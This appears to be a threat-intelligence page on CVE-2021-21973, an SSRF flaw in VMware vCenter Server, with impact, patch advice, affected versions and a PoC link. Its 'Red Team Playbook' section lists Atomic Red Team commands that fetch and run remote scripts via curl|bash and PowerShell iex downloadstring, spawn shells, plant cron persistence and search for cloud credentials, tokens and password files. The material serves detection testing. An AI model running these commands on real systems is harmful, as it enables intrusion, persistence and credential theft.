CVE-2021-21973
Overview
This vulnerability is a Server Side Request Forgery (SSRF) arising from insufficient validation of URLs within a vCenter Server plugin used by the vSphere Client (HTML5). The flaw exists in the processing of POST requests sent to the plugin, specifically affecting the URL parameters that are not properly sanitized. The affected component is the vCenter Server plugin handling network requests on port 443, across multiple versions of VMware vCenter Server and VMware Cloud Foundation.
Vulnerability Description
The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
Impact
An attacker with network access to port 443 can exploit this vulnerability without authentication or user interaction to induce the vCenter Server to send arbitrary HTTP requests. This may lead to unauthorized information disclosure by accessing internal resources or sensitive data. The ability to manipulate server-side requests can facilitate further attacks such as internal reconnaissance or pivoting within the network, potentially compromising business-critical management infrastructure.
Solution
VMware has addressed this vulnerability in advisory VMSA-2021-0002. Users should upgrade VMware vCenter Server to versions 7.0 U1c or later, 6.7 U3l or later, and 6.5 U3n or later. Similarly, VMware Cloud Foundation should be updated to versions 4.2 or later and 3.10.1.2 or later. Detailed patching instructions and version-specific guidance are available at https://www.vmware.com/security/advisories/VMSA-2021-0002.html.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the vSphere Client (HTML5) is characterized as a Server Side Request Forgery (SSRF) issue, which arises from inadequate validation of URLs within a vCenter Server plugin. This flaw allows an attacker with network access to the vCenter Server's port 443 to craft a malicious POST request. By exploiting this vulnerability, the attacker can manipulate the server into making requests to internal or external resources, potentially leading to unauthorized information disclosure. The improper handling of URLs means that the server may inadvertently expose sensitive data or allow access to internal services that should remain secured from external threats.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage their network access to the vCenter Server and send specifically crafted requests that exploit the URL validation flaw. This could lead to the retrieval of sensitive information from the server or other internal systems that are not intended to be exposed to the public internet. For instance, an attacker could gain access to metadata services, internal APIs, or other resources that could provide critical insights into the organization's infrastructure. The ability to access such information could facilitate further attacks, including lateral movement within the network or the extraction of sensitive data.
The real-world impact of this vulnerability can be significant, particularly for organizations relying on VMware's vCenter Server and Cloud Foundation products. The potential for information disclosure poses a considerable business risk, as attackers could obtain sensitive operational data, configuration details, or even credentials that could be used for more extensive breaches. The exploitation of this vulnerability could lead to reputational damage, regulatory penalties, and financial losses, especially if sensitive customer data is compromised. Furthermore, the interconnected nature of modern IT environments means that a successful attack could have cascading effects, impacting multiple systems and services.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regular security assessments and vulnerability scans can help identify systems running affected versions of the vCenter Server and Cloud Foundation products. Implementing network segmentation can limit access to sensitive systems, reducing the attack surface available to potential adversaries. Additionally, organizations should ensure that they are running the latest updates and patches provided by VMware, as these often contain critical fixes for known vulnerabilities. Employing web application firewalls (WAFs) and intrusion detection systems (IDS) can also help monitor and block suspicious traffic patterns indicative of exploitation attempts.
In conclusion, the SSRF vulnerability within the vSphere Client presents a serious risk to organizations using VMware's products. By understanding the technical details, potential attack vectors, and the real-world implications of this vulnerability, cybersecurity professionals can better prepare their defenses. Proactive detection and mitigation strategies are essential to safeguard sensitive information and maintain the integrity of the organization's IT infrastructure. As the threat landscape continues to evolve, staying informed and vigilant against such vulnerabilities is paramount for maintaining robust cybersecurity postures.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-21973, coinciding with the emergence of new proof-of-concept exploits publicly available on GitHub. Although the EPSS score shows a slight downward trend, the increase in observed activity within our telemetry indicates adversaries are actively testing or leveraging this SSRF vulnerability in VMware vCenter Server environments. This shift underscores a growing operational interest that could translate into more widespread exploitation, particularly given the vulnerability’s accessibility via network port 443. For defenders, this development signals an elevated risk posture, necessitating heightened vigilance in monitoring network traffic and plugin interactions on affected systems. While the overall severity rating remains medium, the uptick in exploitation attempts and the availability of automation tools effectively raise the practical threat level, emphasizing the need for continuous detection efforts to preempt potential data disclosure incidents.
Affected Products (43)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:a:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:f:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1e:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update1g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2b:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2c:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update2g:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3d:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:update3f:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
freakanonymous/CVE-2021-21973-Automateme
automate me!
|
freakanonymous | 1 | 1 | 2021-03-16 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
33%
|
High | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-21973 |
| vmware.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.vmware.com/security/advisories/VMSA-2021-0002.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21973 |